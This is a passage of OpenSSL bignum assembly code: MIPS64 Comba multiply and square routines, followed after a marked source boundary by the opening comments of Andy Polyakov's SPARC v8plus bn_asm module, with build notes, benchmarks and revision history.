dmultu a_3,b_7 /* mul_add_c(a[3],b[7],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,80(a0) /* r[10]=c2; */
dmultu a_4,b_7 /* mul_add_c(a[4],b[7],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu c_2,c_1,t_2
dmultu a_5,b_6 /* mul_add_c(a[5],b[6],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_6,b_5 /* mul_add_c(a[6],b[5],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_7,b_4 /* mul_add_c(a[7],b[4],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,88(a0) /* r[11]=c3; */
dmultu a_7,b_5 /* mul_add_c(a[7],b[5],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu c_3,c_2,t_2
dmultu a_6,b_6 /* mul_add_c(a[6],b[6],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_5,b_7 /* mul_add_c(a[5],b[7],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,96(a0) /* r[12]=c1; */
dmultu a_6,b_7 /* mul_add_c(a[6],b[7],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu c_1,c_3,t_2
dmultu a_7,b_6 /* mul_add_c(a[7],b[6],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,104(a0) /* r[13]=c2; */
dmultu a_7,b_7 /* mul_add_c(a[7],b[7],c3,c1,c2); */
/* Restore callee-saved registers while the last multiply runs. */
ld s0,0(sp)
ld s1,8(sp)
ld s2,16(sp)
ld s3,24(sp)
ld s4,32(sp)
ld s5,40(sp)
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sd c_3,112(a0) /* r[14]=c3; */
sd c_1,120(a0) /* r[15]=c1; */
PTR_ADD sp,FRAME_SIZE
jr ra
END(bn_mul_comba8)
.align 5
LEAF(bn_mul_comba4)
/*
 * void bn_mul_comba4(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
 *   Comba 4x4 multiply: r[0..7] = a[0..3]*b[0..3].
 * Registers: a0=r, a1=a, a2=b.  Same stanza pattern as bn_mul_comba8;
 * no callee-saved registers are needed, so there is no stack frame.
 */
.set reorder
ld a_0,0(a1)
ld b_0,0(a2)
ld a_1,8(a1)
ld a_2,16(a1)
dmultu a_0,b_0 /* mul_add_c(a[0],b[0],c1,c2,c3); */
ld a_3,24(a1)
ld b_1,8(a2)
ld b_2,16(a2)
ld b_3,24(a2)
mflo c_1
mfhi c_2
sd c_1,0(a0)
dmultu a_0,b_1 /* mul_add_c(a[0],b[1],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu c_3,t_2,AT
dmultu a_1,b_0 /* mul_add_c(a[1],b[0],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu c_1,c_3,t_2
sd c_2,8(a0)
dmultu a_2,b_0 /* mul_add_c(a[2],b[0],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
dmultu a_1,b_1 /* mul_add_c(a[1],b[1],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu c_2,c_1,t_2
dmultu a_0,b_2 /* mul_add_c(a[0],b[2],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,16(a0)
dmultu a_0,b_3 /* mul_add_c(a[0],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu c_3,c_2,t_2
dmultu a_1,b_2 /* mul_add_c(a[1],b[2],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_2,b_1 /* mul_add_c(a[2],b[1],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_3,b_0 /* mul_add_c(a[3],b[0],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,24(a0)
dmultu a_3,b_1 /* mul_add_c(a[3],b[1],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu c_1,c_3,t_2
dmultu a_2,b_2 /* mul_add_c(a[2],b[2],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_1,b_3 /* mul_add_c(a[1],b[3],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,32(a0)
dmultu a_2,b_3 /* mul_add_c(a[2],b[3],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu c_2,c_1,t_2
dmultu a_3,b_2 /* mul_add_c(a[3],b[2],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,40(a0)
dmultu a_3,b_3 /* mul_add_c(a[3],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sd c_1,48(a0)
sd c_2,56(a0)
jr ra
END(bn_mul_comba4)
/*
 * bn_sqr_comba8 (below) squares a single 8-dword input, so the registers
 * that the bn_mul_comba* routines used for b[0..3] are free here;
 * re-alias a_4..a_7 onto them to hold a[4]..a[7].
 */
#undef a_4
#undef a_5
#undef a_6
#undef a_7
#define a_4 b_0
#define a_5 b_1
#define a_6 b_2
#define a_7 b_3
.align 5
LEAF(bn_sqr_comba8)
.set reorder
ld a_0,0(a1)
ld a_1,8(a1)
ld a_2,16(a1)
ld a_3,24(a1)
dmultu a_0,a_0 /* mul_add_c(a[0],b[0],c1,c2,c3); */
ld a_4,32(a1)
ld a_5,40(a1)
ld a_6,48(a1)
ld a_7,56(a1)
mflo c_1
mfhi c_2
sd c_1,0(a0)
dmultu a_0,a_1 /* mul_add_c2(a[0],b[1],c2,c3,c1); */
mflo t_1
mfhi t_2
slt c_1,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu c_3,t_2,AT
sd c_2,8(a0)
dmultu a_2,a_0 /* mul_add_c2(a[2],b[0],c3,c1,c2); */
mflo t_1
mfhi t_2
slt c_2,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_1,a_1 /* mul_add_c(a[1],b[1],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,16(a0)
dmultu a_0,a_3 /* mul_add_c2(a[0],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
slt c_3,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_1,a_2 /* mul_add_c2(a[1],b[2],c1,c2,c3); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_3,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,24(a0)
dmultu a_4,a_0 /* mul_add_c2(a[4],b[0],c2,c3,c1); */
mflo t_1
mfhi t_2
slt c_1,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_3,a_1 /* mul_add_c2(a[3],b[1],c2,c3,c1); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_1,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_2,a_2 /* mul_add_c(a[2],b[2],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,32(a0)
dmultu a_0,a_5 /* mul_add_c2(a[0],b[5],c3,c1,c2); */
mflo t_1
mfhi t_2
slt c_2,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_1,a_4 /* mul_add_c2(a[1],b[4],c3,c1,c2); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_2,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_2,a_3 /* mul_add_c2(a[2],b[3],c3,c1,c2); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_2,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,40(a0)
dmultu a_6,a_0 /* mul_add_c2(a[6],b[0],c1,c2,c3); */
mflo t_1
mfhi t_2
slt c_3,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_5,a_1 /* mul_add_c2(a[5],b[1],c1,c2,c3); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_3,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_4,a_2 /* mul_add_c2(a[4],b[2],c1,c2,c3); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_3,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_3,a_3 /* mul_add_c(a[3],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,48(a0)
dmultu a_0,a_7 /* mul_add_c2(a[0],b[7],c2,c3,c1); */
mflo t_1
mfhi t_2
slt c_1,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_1,a_6 /* mul_add_c2(a[1],b[6],c2,c3,c1); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_1,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_2,a_5 /* mul_add_c2(a[2],b[5],c2,c3,c1); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_1,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_3,a_4 /* mul_add_c2(a[3],b[4],c2,c3,c1); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_1,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,56(a0)
dmultu a_7,a_1 /* mul_add_c2(a[7],b[1],c3,c1,c2); */
mflo t_1
mfhi t_2
slt c_2,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_6,a_2 /* mul_add_c2(a[6],b[2],c3,c1,c2); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_2,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_5,a_3 /* mul_add_c2(a[5],b[3],c3,c1,c2); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_2,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_4,a_4 /* mul_add_c(a[4],b[4],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,64(a0)
dmultu a_2,a_7 /* mul_add_c2(a[2],b[7],c1,c2,c3); */
mflo t_1
mfhi t_2
slt c_3,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_3,a_6 /* mul_add_c2(a[3],b[6],c1,c2,c3); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_3,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_4,a_5 /* mul_add_c2(a[4],b[5],c1,c2,c3); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_3,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,72(a0)
dmultu a_7,a_3 /* mul_add_c2(a[7],b[3],c2,c3,c1); */
mflo t_1
mfhi t_2
slt c_1,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_6,a_4 /* mul_add_c2(a[6],b[4],c2,c3,c1); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_1,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_5,a_5 /* mul_add_c(a[5],b[5],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,80(a0)
dmultu a_4,a_7 /* mul_add_c2(a[4],b[7],c3,c1,c2); */
mflo t_1
mfhi t_2
slt c_2,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_5,a_6 /* mul_add_c2(a[5],b[6],c3,c1,c2); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_2,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,88(a0)
dmultu a_7,a_5 /* mul_add_c2(a[7],b[5],c1,c2,c3); */
mflo t_1
mfhi t_2
slt c_3,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_6,a_6 /* mul_add_c(a[6],b[6],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,96(a0)
dmultu a_6,a_7 /* mul_add_c2(a[6],b[7],c2,c3,c1); */
mflo t_1
mfhi t_2
slt c_1,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,104(a0)
dmultu a_7,a_7 /* mul_add_c(a[7],b[7],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sd c_3,112(a0)
sd c_1,120(a0)
jr ra
END(bn_sqr_comba8)
/*
 * bn_sqr_comba4 -- Comba (column-wise) squaring of a 4-dword number:
 *     r[0..7] = a[0..3]^2
 * Arguments: a0 = r (8 dwords out), a1 = a (4 dwords in).
 * Register aliases (a_0..a_3, c_1..c_3, t_1/t_2, AT) are #defined earlier
 * in this file.  c_1/c_2/c_3 rotate as a three-word column accumulator;
 * t_1/t_2 receive the 128-bit dmultu product via mflo/mfhi.
 * Off-diagonal products a[i]*a[j] (i != j) occur twice in a square, so
 * those stanzas double the product: "slt reg,t_x,zero" captures the top
 * bit about to be shifted out by "dsll t_x,1".  Register a2 (an argument
 * register not used as an argument here) serves as scratch for that bit.
 */
.align 5
LEAF(bn_sqr_comba4)
.set reorder
ld a_0,0(a1)
ld a_1,8(a1)
ld a_2,16(a1)
ld a_3,24(a1)
dmultu a_0,a_0 /* mul_add_c(a[0],b[0],c1,c2,c3); */
mflo c_1
mfhi c_2
sd c_1,0(a0) /* r[0]=c1; */
dmultu a_0,a_1 /* mul_add_c2(a[0],b[1],c2,c3,c1); */
mflo t_1
mfhi t_2
slt c_1,t_2,zero /* save bit shifted out of t_2 by the doubling below */
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1 /* carry out of c_2 */
daddu c_3,t_2,AT
sd c_2,8(a0) /* r[1]=c2; */
dmultu a_2,a_0 /* mul_add_c2(a[2],b[0],c3,c1,c2); */
mflo t_1
mfhi t_2
slt c_2,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_1,a_1 /* mul_add_c(a[1],b[1],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,16(a0) /* r[2]=c3; */
dmultu a_0,a_3 /* mul_add_c2(a[0],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
slt c_3,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_1,a_2 /* mul_add_c2(a[1],b[2],c1,c2,c3); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_3,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,24(a0) /* r[3]=c1; */
dmultu a_3,a_1 /* mul_add_c2(a[3],b[1],c2,c3,c1); */
mflo t_1
mfhi t_2
slt c_1,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_2,a_2 /* mul_add_c(a[2],b[2],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,32(a0) /* r[4]=c2; */
dmultu a_2,a_3 /* mul_add_c2(a[2],b[3],c3,c1,c2); */
mflo t_1
mfhi t_2
slt c_2,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,40(a0) /* r[5]=c3; */
dmultu a_3,a_3 /* mul_add_c(a[3],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sd c_1,48(a0) /* r[6]=c1; */
sd c_2,56(a0) /* r[7]=c2; */
jr ra
END(bn_sqr_comba4)
/*
 * --------------------------------------------------------------------
 * Source boundary: the following section originates from repository
 * AIFM-sys/AIFM (32,783 bytes), file
 * shenango/apps/parsec/pkgs/libs/ssl/src/crypto/bn/asm/sparcv8plus.S
 * --------------------------------------------------------------------
 */
.ident "sparcv8plus.s, Version 1.4"
.ident "SPARC v9 ISA artwork by Andy Polyakov <appro@fy.chalmers.se>"
/*
* ====================================================================
* Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
* project.
*
* Rights for redistribution and usage in source and binary forms are
* granted according to the OpenSSL license. Warranty of any kind is
* disclaimed.
* ====================================================================
*/
/*
* This is my modest contribution to the OpenSSL project (see
* http://www.openssl.org/ for more information about it) and is
* a drop-in UltraSPARC ISA replacement for crypto/bn/bn_asm.c
* module. For updates see http://fy.chalmers.se/~appro/hpe/.
*
* Questions-n-answers.
*
* Q. How to compile?
* A. With SC4.x/SC5.x:
*
* cc -xarch=v8plus -c bn_asm.sparc.v8plus.S -o bn_asm.o
*
* and with gcc:
*
* gcc -mcpu=ultrasparc -c bn_asm.sparc.v8plus.S -o bn_asm.o
*
* or if above fails (it does if you have gas installed):
*
* gcc -E bn_asm.sparc.v8plus.S | as -xarch=v8plus /dev/fd/0 -o bn_asm.o
*
* Quick-n-dirty way to fuse the module into the library.
* Provided that the library is already configured and built
* (in 0.9.2 case with no-asm option):
*
* # cd crypto/bn
* # cp /some/place/bn_asm.sparc.v8plus.S .
* # cc -xarch=v8plus -c bn_asm.sparc.v8plus.S -o bn_asm.o
* # make
* # cd ../..
* # make; make test
*
* Quick-n-dirty way to get rid of it:
*
* # cd crypto/bn
* # touch bn_asm.c
* # make
* # cd ../..
* # make; make test
*
* Q. V8plus architecture? What kind of beast is that?
* A. Well, it's rather a programming model than an architecture...
* It's actually v9-compliant, i.e. *any* UltraSPARC CPU, under
* special conditions, namely when kernel doesn't preserve upper
* 32 bits of otherwise 64-bit registers during a context switch.
*
* Q. Why just UltraSPARC? What about SuperSPARC?
* A. Original release did target UltraSPARC only. Now SuperSPARC
* version is provided along. Both version share bn_*comba[48]
* implementations (see comment later in code for explanation).
* But what's so special about this UltraSPARC implementation?
* Why didn't I let compiler do the job? Trouble is that most of
* available compilers (well, SC5.0 is the only exception) don't
* attempt to take advantage of UltraSPARC's 64-bitness under
* 32-bit kernels even though it's perfectly possible (see next
* question).
*
* Q. 64-bit registers under 32-bit kernels? Didn't you just say it
* doesn't work?
* A. You can't address *all* registers as 64-bit wide:-( The catch is
* that you actually may rely upon %o0-%o5 and %g1-%g4 being fully
* preserved if you're in a leaf function, i.e. such never calling
* any other functions. All functions in this module are leaf and
* 10 registers is a handful. And as a matter of fact non-"comba"
* routines don't require even that much and I could even afford to
* not allocate own stack frame for 'em:-)
*
* Q. What about 64-bit kernels?
* A. What about 'em? Just kidding:-) Pure 64-bit version is currently
* under evaluation and development...
*
* Q. What about shared libraries?
* A. What about 'em? Kidding again:-) Code does *not* contain any
* code position dependencies and it's safe to include it into
* shared library as is.
*
* Q. How much faster does it go?
* A. Do you have a good benchmark? In either case below is what I
* experience with crypto/bn/expspeed.c test program:
*
* v8plus module on U10/300MHz against bn_asm.c compiled with:
*
* cc-5.0 -xarch=v8plus -xO5 -xdepend +7-12%
* cc-4.2 -xarch=v8plus -xO5 -xdepend +25-35%
* egcs-1.1.2 -mcpu=ultrasparc -O3 +35-45%
*
* v8 module on SS10/60MHz against bn_asm.c compiled with:
*
* cc-5.0 -xarch=v8 -xO5 -xdepend +7-10%
* cc-4.2 -xarch=v8 -xO5 -xdepend +10%
* egcs-1.1.2 -mv8 -O3 +35-45%
*
* As you can see it's damn hard to beat the new Sun C compiler
* and it's in first place GNU C users who will appreciate this
* assembler implementation:-)
*/
/*
* Revision history.
*
* 1.0 - initial release;
* 1.1 - new loop unrolling model(*);
* - some more fine tuning;
* 1.2 - made gas friendly;
* - updates to documentation concerning v9;
* - new performance comparison matrix;
* 1.3 - fixed problem with /usr/ccs/lib/cpp;
* 1.4 - native V9 bn_*_comba[48] implementation (15% more efficient)
* resulting in slight overall performance kick;
* - some retunes;
* - support for GNU as added;
*
* (*) Originally unrolled loop looked like this:
* for (;;) {
* op(p+0); if (--n==0) break;
* op(p+1); if (--n==0) break;
* op(p+2); if (--n==0) break;
* op(p+3); if (--n==0) break;
* p+=4;
* }
* I unroll according to following:
* while (n&~3) {
* op(p+0); op(p+1); op(p+2); op(p+3);
* p+=4; n-=4;
* }
* if (n) {
* op(p+0); if (--n==0) return;
* op(p+1); if (--n==0) return;
* op(p+2); return;
* }
*/
/*
* GNU assembler can't stand stuw:-(
*/
#define stuw st
.section ".text",#alloc,#execinstr
.file "bn_asm.sparc.v8plus.S"
.align 32
.global bn_mul_add_words
/*
 * BN_ULONG bn_mul_add_words(rp,ap,num,w)
 * BN_ULONG *rp,*ap;
 * int num;
 * BN_ULONG w;
 *
 * rp[i] += ap[i]*w for i in [0,num); returns the final carry word.
 * Register roles: %o0=rp, %o1=ap, %o2=num (sign-extended), %o3=w
 * (zero-extended to 32 bits), %o5=running carry, %g1-%g3/%o4=scratch.
 * Main loop processes 4 words per iteration; the tail handles 0-3
